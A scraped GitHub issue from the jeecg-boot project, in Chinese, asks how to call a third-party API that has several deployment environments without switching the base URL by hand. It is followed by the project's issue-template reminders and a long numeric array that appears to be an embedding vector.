This is a GitHub Issue repo:jeecg-boot owner:jeecgboot Title : 写接口的时候,要在这个接口里去调用第三方接口,并且第三方接口有多个部署环境,有不需要手动切换baseurl的实现方式吗 Issue date: --- start body --- ##### 版本号: 3.6.3 ##### 分支: master?还是springboot3? master ##### 前端版本: vue3版?还是 vue2版? vue3 ##### 问题描述: 写接口的时候,要在这个接口里去调用第三方接口,并且第三方接口有多个部署环境,有不需要手动切换baseurl的实现方式吗 ##### 截图&代码: #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖、描述过于简抽象的,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - springboot3_sas分支采用 `Spring Authorization Server` 替换 `Shiro`,目前是beta版不稳定,生产项目不要使用; --- end body ---
597
[ 0.012488504871726036, -0.02432391233742237, -0.0075424835085868835, 0.0397593230009079, 0.0379752516746521, -0.005921686068177223, -0.0001691234647296369, 0.05071862414479256, 0.0037473479751497507, 0.0022997804917395115, 0.009015936404466629, 0.016231870278716087, 0.025837186723947525, -0.0041336314752697945, -0.018876120448112488, 0.043486759066581726, -0.01734691485762596, 0.03348321095108986, 0.01447965670377016, 0.015387622639536858, -0.00396040128543973, -0.010959300212562084, -0.004261065274477005, 0.03517170622944832, 0.002074780408293009, 0.025550462305545807, 0.007331421598792076, 0.005232747178524733, -0.06343013793230057, -0.00285929418168962, 0.009430095553398132, 0.02102656476199627, 0.02416462078690529, 0.012026557698845863, -0.009756644256412983, 0.017729217186570168, 0.009931866079568863, 0.0125840799883008, -0.04453808814287186, -0.04211684688925743, -0.0023515503853559494, -0.02067612111568451, -0.005109295714646578, 0.0095973527058959, -0.016661958768963814, 0.005981420632451773, -0.03491684049367905, 0.015674348920583725, -0.021711520850658417, -0.0003141042252536863, 0.013261072337627411, -0.04973101243376732, 0.00481062289327383, -0.02690444514155388, 0.0010642707347869873, -0.016407091170549393, 0.04743720218539238, 0.00876903347671032, -0.02671329490840435, -0.0003487004723865539, 0.003819029312580824, -0.017856650054454803, 0.040492065250873566, 0.030759315937757492, 0.008601776324212551, 0.07633280009031296, -0.056389421224594116, 0.03392922878265381, -0.0125840799883008, 0.0401734821498394, 0.013507974334061146, 0.002433187561109662, 0.03647790476679802, -0.00005758784755016677, 0.009430095553398132, 0.011604433879256248, 0.05804606154561043, 0.02655400149524212, 0.007423014380037785, 0.003357082139700651, -0.03791153430938721, -0.00628009345382452, -0.031460199505090714, -0.028369933366775513, 0.013563727028667927, -0.018095588311553, -0.024307982996106148, -0.07206377387046814, 0.011692044325172901, 0.029739845544099808, -0.022061962634325027, -0.011246026493608952, -0.0009358414099551737, -0.032224804162979126, -0.011715938337147236, 0.005551331676542759, -0.05024074763059616, -0.0033232325222343206, -0.05157880112528801, 0.00729956291615963, 0.035617727786302567, 0.02750975452363491, -0.021090282127261162, -0.023352229967713356, 0.027684977278113365, -0.0005664827185682952, 0.03083896078169346, 0.005973455961793661, -0.028672587126493454, 0.05501950904726982, -0.023686744272708893, 0.007634076755493879, -0.030169934034347534, -0.008044254034757614, -0.018302667886018753, 0.026777010411024094, -0.017378773540258408, -0.04829738289117813, 0.025279665365815163, 0.037847816944122314, 0.016869038343429565, -0.01004337053745985, 0.009509741328656673, -0.06677526980638504, -0.018127446994185448, -0.02261948585510254, -0.009820361621677876, 0.00896814838051796, 0.02142479456961155, -0.026824798434972763, 0.024785859510302544, -0.03717878833413124, -0.029915066435933113, -0.024084974080324173, 0.019800014793872833, 0.027127454057335854, 0.024005327373743057, 0.03765666484832764, -0.038899146020412445, -0.023798247799277306, -0.01987966150045395, -0.08244962245225906, -0.015037179924547672, -0.007363279815763235, -0.007685846649110317, -0.013197354972362518, 0.03155577555298805, 0.03383365273475647, -0.03249559924006462, -0.01447965670377016, -0.025375239551067352, -0.003500445047393441, 0.026697365567088127, 0.05967084318399429, 0.04052392393350601, -0.02034160867333412, 0.01938585564494133, 0.012042487040162086, 0.036095600575208664, -0.021552229300141335, 0.0021842936985194683, -0.031077899038791656, 0.006793810520321131, -0.0005913721397519112, 0.012743372470140457, -0.042180564254522324, 0.003958410117775202, 0.005228764843195677, -0.035012416541576385, 0.024005327373743057, -0.047023043036460876, 0.010330095887184143, 0.034853123128414154, 0.02844957821071148, -0.047723930329084396, -0.010553105734288692, 0.0326867513358593, -0.028385862708091736, 0.009955760091543198, -0.012106203474104404, 0.01150885783135891, -0.008585846982896328, 0.013754877261817455, 0.003295356407761574, 0.03257524594664574, -0.021998247131705284, 0.00467124255374074, -0.016566384583711624, -0.008657529018819332, -0.046322159469127655, 0.005400003865361214, 0.028194710612297058, 0.02467435412108898, -0.01868497021496296, 0.000929867965169251, -0.017012402415275574, -0.03275046870112419, -0.0227309912443161, -0.0165504552423954, -0.020023023709654808, -0.004555755760520697, -0.019959306344389915, -0.05266198515892029, 0.0010702441213652492, -0.0006740049575455487, -0.009637175127863884, -0.025725683197379112, -0.008689386770129204, -0.010632751509547234, -0.0322088748216629, -0.02038939669728279, -0.0053721279837191105, -0.00347655126824975, -0.027780551463365555, 0.0032316395081579685, 0.005814163479954004, 0.015435409732162952, -0.001337058492936194, -0.007192040793597698, 0.0025088514667004347, 0.009661069139838219, 0.004551773425191641, 0.0062044295482337475, 0.013770806603133678, -0.04705490171909332, 0.004048011731356382, 0.026952233165502548, -0.00357013544999063, 0.003556197276338935, 0.004308852832764387, 0.06158234551548958, 0.0021305326372385025, -0.03090267814695835, -0.02158408798277378, 0.004535844083875418, -0.03673277050256729, 0.0015600675251334906, -0.01968851126730442, -0.027382321655750275, 0.03297347575426102, 0.027031878009438515, 0.0591929666697979, -0.03125312179327011, -0.028895597904920578, -0.014511515386402607, -0.0032256662379950285, 0.03079117275774479, 0.02830621600151062, -0.008330979384481907, -0.01893983781337738, -0.029277898371219635, -0.00027851236518472433, -0.011142486706376076, -0.01068850327283144, 0.014073462225496769, -0.0011618371354416013, 0.00280951545573771, 0.020819485187530518, 0.025853116065263748, -0.002793586114421487, 0.03233630582690239, 0.030934536829590797, -0.04953986033797264, 0.013022134080529213, 0.01913098804652691, -0.05826906859874725, 0.016614172607660294, 0.053394731134176254, -0.004356640391051769, 0.0406513586640358, 0.03275046870112419, -0.029341615736484528, -0.03835755214095116, 0.06260181963443756, -0.0018448022892698646, 0.013444257900118828, 0.02720710076391697, 0.01256018690764904, 0.03995047137141228, -0.023893823847174644, 0.011827442795038223, 0.03184250369668007, 0.02741418033838272, -0.01099115889519453, -0.02067612111568451, 0.0038787638768553734, -0.009461954236030579, -0.01193894725292921, -0.02247612364590168, 0.0071681467816233635, -0.0216318741440773, -0.014710630290210247, -0.018525676801800728, 0.004368587397038937, 0.040587641298770905, 0.059766415506601334, 0.0006764938589185476, 0.028035419061779976, -0.0034247813746333122, 0.0035422593355178833, 0.0022997804917395115, -0.025789400562644005, 0.01590532250702381, -0.021807096898555756, 0.0014425895642489195, -0.0018557535950094461, 0.024387629702687263, 0.003126108553260565, 0.007733634207397699, 0.0019224572461098433, 0.05900181457400322, -0.013484081253409386, -0.044219501316547394, -0.039791181683540344, -0.009923901408910751, 0.056484997272491455, 0.02167966216802597, 0.005320358090102673, -0.050304461270570755, -0.013834523968398571, -0.018812403082847595, 0.035458434373140335, -0.05352216586470604, -0.022189397364854813, 0.07168146967887878, 0.02875223383307457, -0.0049659330397844315, 0.0031778784468770027, -0.001047345926053822, -0.009087617509067059, -0.0008223457261919975, -0.025598248466849327, 0.0061845178715884686, -0.024849576875567436, -0.007395138498395681, -0.05963898450136185, -0.008681422099471092, -0.033610645681619644, -0.007004872430115938, -0.013428328558802605, 0.003572126617655158, 0.03029736876487732, 0.010465494357049465, 0.01828673854470253, 0.025502674281597137, -0.03574515879154205, 0.009661069139838219, 0.0076141650788486, 0.00864956434816122, 0.011445141397416592, 0.0009980648756027222, 0.010624786838889122, -0.012146026827394962, 0.0023535415530204773, 0.01604072004556656, -0.017617711797356606, -0.00247898418456316, -0.004340711049735546, 0.01584956981241703, 0.010369919240474701, 0.018398243933916092, -0.07805315405130386, -0.022444264963269234, 0.03326020389795303, 0.03768852353096008, -0.011628326959908009, -0.007857085205614567, -0.039886754006147385, 0.005264605861157179, -0.029771704226732254, -0.05004959553480148, 0.014814170077443123, 0.012950452044606209, 0.022348688915371895, 0.014615055173635483, 0.0324796698987484, -0.018605323508381844, 0.0030424802098423243, -0.01948142983019352, 0.023591168224811554, 0.025056656450033188, -0.01943364366889, -0.02566196583211422, -0.0011837398633360863, 0.023384088650345802, 0.01929027959704399, 0.014471692033112049, 0.019720368087291718, -0.026378780603408813, -0.0670938566327095, -0.04648144915699959, 0.0481380894780159, -0.00802036002278328, -0.025853116065263748, -0.06043544411659241, 0.01106283999979496, -0.03160356357693672, -0.008498236536979675, -0.005049561150372028, -0.017824791371822357, 0.004890269134193659, 0.00037060314207337797, 0.011954876594245434, 0.03533099964261055, 0.004221241921186447, -0.057090308517217636, -0.013340718112885952, -0.018031872808933258, 0.004675224889069796, 0.02093098871409893, 0.013675231486558914, -0.056038979440927505, -0.014559303410351276, 0.01573806442320347, 0.03549029305577278, 0.01884426176548004, 0.0035143832210451365, 0.022141609340906143, -0.0006396575481630862, -0.012791160494089127, -0.01878054440021515, 0.007837174460291862, -0.0005893809720873833, 0.009143369272351265, 0.005750446580350399, 0.017171693965792656, 0.03216108679771423, 0.05094163119792938, 0.023336300626397133, -0.01288673561066389, -0.026378780603408813, -0.035012416541576385, 0.028768163174390793, 0.022300900891423225, 0.009581423364579678, 0.015260188840329647, 0.017665499821305275, -0.02191860042512417, -0.026824798434972763, -0.02631506323814392, 0.014686736278235912, 0.019720368087291718, 0.017920367419719696, -0.003452657489106059, -0.018525676801800728, -0.02821063995361328, -0.043327465653419495, -0.01504514366388321, 0.012273460626602173, 0.0003111175028607249, -0.04061949998140335, 0.03985489904880524, -0.03104604035615921, -0.003546241670846939, -0.027047807350754738, -0.02800356037914753, -0.05291685461997986, 0.0014455763157457113, 0.05600712075829506, 0.0017064171843230724, 0.001358961220830679, 0.016470808535814285, -0.014989391900599003, 0.0027258871123194695, 0.003546241670846939, 0.00961328111588955, 0.022555768489837646, 0.005161065608263016, 0.006021243520081043, -0.03332391753792763, 0.02446727454662323, 0.0031181438826024532, 0.06556465476751328, 0.04020534083247185, -0.036860205233097076, 0.005499561782926321, -0.0024471257347613573, -0.045621272176504135, 0.007482748944312334, 0.030408872291445732, -0.0635257139801979, 0.014041603542864323, 0.012775231152772903, 0.038293834775686264, -0.002337612444534898, -0.02226904407143593, 0.00876903347671032, -0.002934957854449749, 0.00018617270688991994, 0.00909558217972517, 0.05689915642142296, -0.025056656450033188, 0.0006481199525296688, 0.012663726694881916, -0.003970357123762369, -0.011086734011769295, -0.0022022139746695757, 0.0000751037587178871, 0.029771704226732254, 0.008840714581310749, -0.02774869278073311, 0.013053991831839085, -0.018430102616548538, -0.0024849576875567436, 0.016661958768963814, 0.01029027346521616, 0.013372576795518398, 0.04010976478457451, -0.0047588529996573925, -0.012098238803446293, -0.02228497341275215, -0.011875229887664318, -0.009979653172194958, -0.030679669231176376, 0.005670800805091858, 0.00036413190537132323, -0.005415933206677437, -0.00290907290764153, 0.03762480616569519, 0.005320358090102673, -0.010346025228500366, -0.003928542602807283, 0.007419032044708729, 0.012663726694881916, 0.03641418740153313, 0.007932749576866627, 0.03005843050777912, 0.023909753188490868, 0.036063745617866516, -0.0401734821498394, -0.017761075869202614, 0.01634337566792965, 0.022906212136149406, 0.06011686101555824, -0.0005520468694157898, 0.007685846649110317, -0.01036195456981659, 0.015061073005199432, -0.01948142983019352, -0.0050654904916882515, -0.010377883911132812, 0.03421595320105553, 0.005196906626224518, 0.002690046327188611, -0.03300533443689346, 0.04265844076871872, 0.012982310727238655, 0.0001564298727316782, -0.006176553200930357, 0.015021250583231449, 0.007196023128926754, -0.026569930836558342, 0.008617705665528774, -0.004563720431178808, 0.004766817670315504, -0.029787633568048477, 0.019959306344389915, 0.018223023042082787, -0.01793629676103592, -0.017824791371822357, 0.0057982346042990685, 0.0022300900891423225, 0.029118606820702553, -0.028688516467809677, 0.002638276433572173, -0.017426561564207077, -0.0057783229276537895, -0.009716821834445, -0.003335179528221488, 0.003972348291426897, 0.013189390301704407, 0.02570975385606289, 0.025630107149481773, -0.03284604102373123, -0.0058977920562028885, 0.02027789130806923, 0.039090294390916824, 0.014049568213522434, 0.014073462225496769, -0.009764608927071095, 0.025948692113161087, -0.003623896511271596, -0.005176994949579239, 0.012576115317642689, -0.0013211292680352926, 0.0335787869989872, 0.009278767742216587, -0.034120380878448486, 0.0005405977717600763, -0.013022134080529213, 0.013635408133268356, -0.023654885590076447, -0.009366379119455814, -0.006355756893754005, 0.04501596465706825, 0.0033491174690425396, -0.006435403134673834, 0.0339929461479187, 0.005822128150612116, -0.028815951198339462, -0.0005744473310187459, 0.006327881012111902, 0.017808863893151283, -0.027318604290485382, 0.0016596250934526324, 0.02512037381529808, 0.021966388449072838, -0.006080978084355593, -0.003651772625744343, 0.01779293455183506, 0.0026104000862687826, 0.02750975452363491, 0.03083896078169346, -0.0104893883690238, -0.03380179405212402, -0.00471106544137001, 0.028242498636245728, 0.0032057545613497496, 0.026235418394207954, 0.010529211722314358, 0.010107086971402168, -0.03966374695301056, 0.03055223450064659, -0.015443374402821064, 0.001878651906736195, 0.039345163851976395, 0.02610798366367817, -0.025184089317917824, -0.009286732412874699, -0.01079204399138689, -0.04899826645851135, -0.00030589071684516966, -0.035299140959978104, -0.02746196836233139, 0.01569824106991291, 0.0007018810720182955, 0.03212922811508179, 0.010672574862837791, -0.004547791089862585, 0.027876127511262894, -0.03851684182882309, 0.016327446326613426, -0.02093098871409893, 0.029723916202783585, -0.013149567879736423, 0.02231683023273945, -0.0344708226621151, 0.026777010411024094, -0.0027039842680096626, 0.0203256793320179, 0.0009502772591076791, -0.00467124255374074, 0.0028234533965587616, 0.017028331756591797, 0.01924249157309532, -0.007638058625161648, -0.01784072071313858, 0.01233717706054449, 0.005977438297122717, -0.017076119780540466, -0.05861951410770416, -0.0013201336842030287, -0.0040818615816533566, -0.008426555432379246, 0.014933639205992222, 0.007566377520561218, 0.016160188242793083, 0.029867278411984444, 0.018366385251283646, 0.028194710612297058, 0.021361077204346657, -0.008418590761721134, -0.015817711129784584, -0.031460199505090714, 0.0016626118449494243, -0.017904438078403473, -0.02472214214503765, -0.01659824326634407, -0.002120576798915863, -0.02392568252980709, -0.0011478990782052279, -0.019051341339945793, -0.01674160547554493, -0.02521594800055027, -0.009780538268387318, 0.008705316111445427, -0.008729210123419762, -0.023861965164542198, 0.013890275731682777, 0.024132762104272842, 0.005161065608263016, 0.01579381711781025, 0.0410655178129673, 0.0011070804903283715, 0.0072358460165560246, 0.005989384837448597, 0.015865499153733253, 0.008203545585274696, 0.008984077721834183, 0.01749027892947197, -0.03427967056632042, -0.00242920545861125, -0.021966388449072838, -0.01068850327283144, 0.03558586910367012, 0.012018593028187752, 0.006124783307313919, -0.015411515720188618, -0.0019881653133779764, -0.0013032089918851852, 0.000050338810979155824, -0.023431876674294472, -0.0008766046375967562, -0.000190777238458395, -0.04533454775810242, 0.017171693965792656, -0.02421240694820881, -0.031412411481142044, -0.04364604875445366, 0.02830621600151062, -0.030966395512223244, -0.01798408478498459, -0.002190267201513052, -0.033610645681619644, -0.007108412217348814, -0.02680886909365654, 0.03418409824371338, 0.013308859430253506, 0.004205313045531511, -0.0007352328393608332, -0.00371349835768342, 0.022635415196418762, -0.013189390301704407, 0.013723019510507584, 0.005196906626224518, 0.0046592955477535725, 0.0010801999596878886, -0.0022300900891423225, -0.032718610018491745, -0.002162391087040305, -0.012735407799482346, -0.025279665365815163, 0.016160188242793083, -0.006889385636895895, -0.007908855564892292, -0.011516822502017021, -0.02381417714059353, 0.021456653252243996, -0.03494869917631149, -0.0033491174690425396, 0.014320365153253078, 0.00934248510748148, -0.007606200408190489, -0.012480540201067924, -0.022093821316957474, -0.0013022134080529213, 0.02421240694820881, 0.015315940603613853, -0.01595310866832733, 0.0013888285029679537, 0.011070804670453072, 0.035299140959978104, -0.005583189893513918, 0.018525676801800728, 0.0265062153339386, 0.005073455162346363, 0.0025128338020294905, -0.016582313925027847, 0.011397353373467922, 0.0062721287831664085, 0.017378773540258408, 0.013770806603133678, -0.009461954236030579, 0.0008527108002454042, -0.026920374482870102, 0.010959300212562084, 0.007634076755493879, -0.001287279766984284, -0.035299140959978104, 0.0026044268161058426, -0.014718594960868359, -0.013786735944449902, 0.007912837900221348, -0.007789386436343193, 0.022762849926948547, -0.018414173275232315, -0.028640730306506157, -0.03437524661421776, 0.021568158641457558, 0.008450448513031006, -0.0152283301576972, -0.0035900468938052654, -0.00819558184593916, -0.005220800172537565, 0.07047084718942642, -0.029739845544099808, -0.013555762358009815, -0.02959648333489895, 0.013723019510507584, -0.02606019750237465, 0.0054398272186517715, -0.005029649939388037, -0.013213284313678741, 0.02795577235519886, -0.012042487040162086, 0.029373472556471825, -0.0012205761158838868, -0.0014893816551193595, -0.03415223956108093, 0.032623033970594406, -0.020357538014650345, 0.00342677254229784, -0.028768163174390793, 0.0344708226621151, 0.01674160547554493, 0.007347350474447012, -0.01917877607047558, 0.0016347357304766774, 0.008299121633172035, 0.020453112199902534, -0.014885852113366127, 0.019815944135189056, 0.029373472556471825, -0.024180548265576363, 0.022348688915371895, -0.0021285414695739746, 0.019417714327573776, 0.03189028799533844, -0.019465500488877296, -0.010959300212562084, 0.036063745617866516, -0.0104893883690238, -0.01749027892947197, 0.00019289283955004066, -0.047564636915922165, 0.028943384066224098, 0.011827442795038223, 0.030074359849095345, -0.015180542133748531, 0.024292053654789925, -0.0016795366536825895, -0.008482307195663452, -0.009143369272351265, -0.021042494103312492, -0.01828673854470253, 0.008243368938565254, -0.01161239854991436, -0.02207789197564125, 0.04240357130765915, 0.016407091170549393, 0.005467703100293875, 0.02043718285858631, -0.017649570479989052, 0.015005321241915226, 0.008601776324212551, 0.002030974952504039, -0.0013649346074089408, 0.02147258259356022, -0.01251239888370037, -0.027446039021015167, 0.023208867758512497, -0.0017084083519876003, 0.005423897877335548, -0.016518596559762955, -0.0027497808914631605, -0.018557535484433174, 0.006785845849663019, -0.051100924611091614, -0.003307303413748741, 0.0032236750703305006, -0.00729956291615963, -0.0392814464867115, -0.022938070818781853, 0.017123905941843987, -0.020803555846214294, -0.0013768816133961082, 0.011381424963474274, 0.01599293202161789, -0.022555768489837646, -0.030233651399612427, -0.021392935886979103, -0.001999116502702236, -0.027637189254164696, -0.026585860177874565, 0.00571858836337924, -0.024307982996106148, -0.007359297480434179, -0.014009744860231876, -0.0026402673684060574, -0.02336815930902958, 0.022906212136149406, 0.011030981317162514, -0.009374343790113926, -0.037847816944122314, 0.00410973746329546, 0.015451339073479176, -0.0010144918924197555, -0.04804251343011856, -0.026729224249720573, 0.03313276916742325, -0.009039829485118389, 0.00998761784285307, -0.008012395352125168, -0.014782312326133251, 0.005423897877335548, -0.002427214290946722, 0.027828339487314224, 0.008530095219612122, -0.009485848248004913, 0.041384100914001465, 0.01620001159608364, -0.006240270100533962, -0.046162866055965424, -0.03647790476679802, -0.009461954236030579, 0.005722570698708296, -0.023893823847174644, 0.0005022680852562189, -0.0055911545641720295, 0.03044073097407818, 0.0062362877652049065, 0.015077002346515656, -0.011341601610183716, 0.007024784106761217, 0.02551860362291336, -0.025391168892383575, 0.0014734524302184582, -0.008745139464735985, -0.013754877261817455, 0.024084974080324173, -0.0006063057808205485, 0.007793368771672249, 0.0008497241069562733, -0.02067612111568451, -0.006228323094546795, -0.027796480804681778, -0.023384088650345802, -0.022093821316957474, 0.018653111532330513, -0.012488504871726036, 0.004603543318808079, 0.007331421598792076, 0.008832749910652637, -0.013061956502497196, 0.014423904940485954, 0.01628762297332287, -0.0055234553292393684, 0.03985489904880524, 0.017522137612104416, -0.02690444514155388, -0.019863732159137726, -0.014909746125340462, -0.007482748944312334, -0.04431507736444473, 0.02491329237818718, 0.0038150472100824118, -0.025725683197379112, 0.0017452447209507227, -0.0200867410749197, -0.0009179210173897445, -0.009278767742216587, -0.0037553126458078623, -0.021663732826709747, -0.006507084704935551, -0.015562843531370163, 0.008092041127383709, 0.0012355097569525242, 0.03956817090511322, -0.021838953718543053, -0.005049561150372028, 0.0010314167011529207, -0.03125312179327011, -0.02116992697119713, -0.007446908392012119, 0.015355763956904411, -0.0007188058225437999, -0.00027029888588003814, -0.0004791209357790649, -0.03533099964261055, -0.02107435278594494, 0.008944254368543625, 0.011078769341111183, 0.020596476271748543, 0.018015943467617035, -0.016016826033592224, -0.0485522486269474, 0.02462656795978546, 0.002674116985872388, -0.020293820649385452, 0.03383365273475647, 0.020070811733603477, -0.011548681184649467, 0.002837391570210457, -0.018254881724715233, 0.03549029305577278, -0.01397788617759943, 0.02830621600151062, -0.02231683023273945, -0.03278232738375664, -0.03622303530573845, -0.03644604608416557, 0.003621905343607068, 0.008984077721834183, -0.00037309210165403783, 0.020819485187530518, 0.03303719311952591, 0.0007924785022623837, 0.01099115889519453, 0.009820361621677876, -0.02222125604748726, -0.009023900143802166, -0.03835755214095116, 0.0020767715759575367, 0.004531861748546362, -0.003311285749077797, 0.01243275310844183, -0.007841156795620918, -0.010831866413354874, 0.03219294548034668, 0.029118606820702553, 0.0048265522345900536, 0.011500893160700798, 0.008458413183689117, 0.013699125498533249, 0.01201062835752964, 0.009374343790113926, -0.04246728867292404, 0.030010642483830452, 0.015403551049530506, 0.0005251663387753069, 0.00979646760970354, 0.015276117250323296, -0.002463054843246937, -0.020023023709654808, 0.013659302145242691, -0.02736639231443405, 0.0005510512855835259, -0.06292039901018143, -0.03249559924006462, 0.027238959446549416, 0.06881421059370041, -0.014750453643500805, 0.004575666971504688, 0.013587621040642262, -0.01608850806951523, -0.014240718446671963, 0.011094698682427406, 0.02387789450585842, 0.02720710076391697, -0.03303719311952591, 0.021058423444628716, 0.009461954236030579, 0.025598248466849327, 0.027398250997066498, -0.0075106252916157246, -0.02242833562195301, -0.01903541199862957, -0.010425671935081482, -0.021090282127261162, 0.018525676801800728, -0.0016865057405084372, -0.009676998481154442, 0.010433636605739594, -0.0091672632843256, -0.026745153591036797, -0.015156649053096771, 0.011261955834925175, 0.011604433879256248, 0.026888515800237656, 0.004527879413217306, -0.0017442491371184587, -0.01624779962003231, -0.0024232319556176662, 0.0062721287831664085, 0.004961950704455376, -0.0034626133274286985, 0.028035419061779976, 0.006359739229083061, -0.005579207558184862, -0.01713983528316021, -0.008490271866321564, -0.02147258259356022, 0.004348675720393658, 0.02685665711760521, -0.005276552867144346, 0.009533635340631008, -0.02123364433646202, -0.022412406280636787, -0.0025128338020294905, -0.010847795754671097, -0.014471692033112049, -0.0025765507016330957, -0.03364250436425209, -0.004655313212424517, -0.017777005210518837, -0.03762480616569519, 0.0038289851509034634, 0.023240724578499794, 0.003241595346480608, 0.0034865071065723896, -0.011915053240954876, 0.002050886396318674, 0.0012006646720692515, 0.011556645855307579, 0.01435222290456295, -0.00009800201223697513, -0.010099122300744057, -0.0034407104831188917, -0.0033451353665441275, -0.007267704699188471, -0.02765311859548092, -0.0016377224819734693, -0.00896814838051796, 0.011086734011769295, -0.021615944802761078, 0.009238945320248604, 0.03275046870112419, -0.0229699295014143, 0.019847802817821503, 0.012440717779099941, -0.015913287177681923, -0.006821686401963234, -0.005101331509649754, -0.012775231152772903, 0.0007904873345978558, -0.003888719715178013, 0.007693811319768429, 0.001238496508449316, 0.006957084871828556, -0.0026522143743932247, -0.012544257566332817, 0.014415940269827843, 0.007964607328176498, 0.016630101948976517, 0.00814779382199049, -0.0009149343241006136, -0.014519480057060719, 0.0005918699316680431, -0.007379209157079458, 0.037146929651498795, 0.019465500488877296, -0.017474349588155746, -0.010202663019299507, 0.024849576875567436, 0.03168321028351784, -0.012169920839369297, -0.01610443741083145, 0.0069849612191319466, -0.00974071491509676, -0.0008785958052612841, -0.005025667604058981, -0.005392039660364389, 0.0069531025364995, -0.007243810687214136, 0.004511950071901083, -0.006053101737052202, -0.009780538268387318, 0.011429212056100368, 0.013356647454202175, 0.017171693965792656, -0.0007710735662840307, 0.002030974952504039, 0.01823895238339901, 0.0023734532296657562, -0.0016227888409048319, 0.03204958140850067, 0.018047800287604332, 0.00635177455842495, -0.0037075248546898365, -0.009955760091543198, 0.0029727898072451353, 0.010003547184169292, -0.0009263834217563272, -0.011500893160700798, -0.0020887183491140604, 0.014623019844293594, -0.022603556513786316, 0.008235404267907143, 0.005208853632211685, -0.006176553200930357, 0.00395044544711709, -0.015061073005199432, 0.023336300626397133, -0.006769916508346796, -0.018015943467617035, 0.011341601610183716, -0.007829209789633751, 0.01620001159608364, -0.0000069690318014181685, 0.0037533214781433344, 0.0091672632843256, 0.010401777923107147, 0.007383191492408514, 0.01245664618909359, 0.03915401175618172, -0.005216818302869797, -0.01459912583231926, -0.006208411883562803, 0.030074359849095345, -0.0010891600977629423, 0.009661069139838219, 0.006200447212904692, -0.008127882145345211, 0.012416823767125607, 0.00305243581533432, 0.017267270013689995, 0.0022559750359505415, -0.00039424808346666396, -0.002331638941541314, 0.012161956168711185, -0.02735046297311783, -0.02371860109269619, 0.004890269134193659, -0.02327258326113224, 0.029867278411984444, 0.017553996294736862, -0.03972746431827545, -0.019210634753108025, -0.019959306344389915, -0.0183345265686512, -0.02496108040213585, 0.013635408133268356, 0.04460180178284645, -0.003928542602807283, -0.004794694017618895, 0.02940533123910427, -0.008609740994870663, 0.013523903675377369, 0.02093098871409893, -0.028784092515707016, 0.032511528581380844, 0.028513295575976372, 0.004926109686493874, 0.008235404267907143, 0.006244252435863018, 0.013173460960388184, -0.0003743365523405373, -0.03024958074092865, 0.018812403082847595, -0.003026550868526101, -0.006805757526308298, 0.0280513484030962, -0.030663739889860153, -0.026984091848134995, 0.01604072004556656, 0.012544257566332817, -0.004531861748546362, -0.015268153510987759, -0.01898762583732605, -0.016120366752147675, -0.026649577543139458, 0.008016377687454224, -0.01502921525388956, -0.0012056424748152494, -0.0009662064840085804, -0.023654885590076447, -0.00986814871430397, 0.0004024615918751806, 0.010632751509547234, -0.0012205761158838868, -0.004428321961313486, 0.020755767822265625, 0.021695591509342194, -0.0003596518072299659, -0.043040741235017776, -0.04042834788560867, -0.012082310393452644, 0.010146910324692726, 0.0030803121626377106, 0.004918145481497049, 0.01933806762099266, -0.010377883911132812, -0.010553105734288692, 0.0021066388580948114, 0.009438060224056244, 0.010608857497572899, -0.017777005210518837, 0.004312835168093443, -0.008538059890270233, 0.003948454279452562, 0.007988501340150833, -0.008888502605259418, -0.0028672588523477316, -0.014463727362453938, -0.018700899556279182, -0.0379752516746521, 0.0038469056598842144, 0.022189397364854813, 0.0007790381787344813, -0.008745139464735985, -0.01300620473921299, -0.008107970468699932, 0.014256647787988186, 0.01397788617759943, 0.00984425563365221, 0.009453989565372467, -0.0016556428745388985, 0.010449565015733242, 0.023081433027982712, -0.0007163169211708009, -0.015889393165707588, 0.012169920839369297, -0.0183345265686512, 0.0033491174690425396, -0.007765492424368858, 0.003625887678936124, 0.001528209075331688, 0.013014169409871101, -0.00974071491509676, 0.009318591095507145, 0.0031340732239186764, 0.020309749990701675, -0.012902664951980114, -0.00814779382199049, -0.01903541199862957, -0.004950003698468208, -0.013213284313678741, 0.036350470036268234, 0.016805322840809822, -0.005396021995693445, 0.00979646760970354, 0.019369926303625107, 0.016311516985297203, 0.016407091170549393, 0.0023037628270685673, 0.015578772872686386, 0.011007088236510754, -0.01410531997680664, -0.007729651872068644, -0.010194698348641396, -0.00018542601901572198, -0.008864608593285084, -0.02142479456961155, 0.020293820649385452, -0.01814337633550167, 0.02924603968858719, 0.016184082254767418, -0.02811506576836109, 0.014184966683387756, -0.009907972067594528, -0.006718146614730358, 0.007359297480434179, -0.000404701626393944, 0.002811506623402238, 0.0019473466090857983, 0.010130980983376503, 0.03294161707162857, -0.002144470578059554, -0.0003026550984941423, 0.01395399309694767, -0.019067270681262016, -0.0375610888004303, -0.0018448022892698646, -0.017617711797356606, 0.009637175127863884, 0.017713287845253944, -0.02736639231443405, 0.021090282127261162, -0.02441948652267456, 0.005415933206677437, -0.00037259430973790586, -0.027446039021015167, -0.012998240068554878, 0.005196906626224518, 0.02636285126209259, -0.010186733677983284, 0.0013191382167860866, -0.007219917140901089, -0.02257169783115387, 0.02975577488541603, -0.00889646727591753, 0.008338944055140018, -0.019672581925988197, 0.01333275344222784, -0.034853123128414154, -0.019306208938360214, 0.0020847360137850046, 0.03265489265322685, -0.007653987966477871, -0.017060190439224243, -0.03807082399725914, 0.0045199147425591946, 0.015467268414795399, 0.008864608593285084, -0.009374343790113926, 0.012942487373948097, 0.011317707598209381, -0.029915066435933113, 0.01713983528316021, 0.014766382984817028, -0.011261955834925175, -0.022587627172470093, 0.023989398032426834, -0.006937173195183277, 0.010895583778619766, 0.00852213054895401, -0.014511515386402607, -0.015212400816380978, -0.005698676686733961, -0.027573471888899803, 0.013643372803926468, 0.00787301454693079, 0.0038508877623826265, -0.020198244601488113, -0.024754000827670097, -0.0025367275811731815, 0.030663739889860153, -0.01614426076412201, -0.006554872263222933, -0.017219481989741325, -0.01769735850393772, 0.002881196793168783, 0.010401777923107147, 0.0017213508253917098, 0.02416462078690529, -0.011962841264903545, -0.0007780425949022174, 0.01882833242416382, -0.013890275731682777, 0.008952219039201736, 0.012791160494089127, 0.008370802737772465, -0.0038429233245551586, -0.019720368087291718, -0.0020827448461204767, -0.010943370871245861, -0.007837174460291862, 0.0035681442823261023, 0.017665499821305275, -0.027286745607852936, -0.03364250436425209, -0.0006486177444458008, 0.006076995749026537, -0.03848498314619064, 0.011333636939525604, -0.04081065207719803, 0.006893367972224951, -0.014766382984817028, 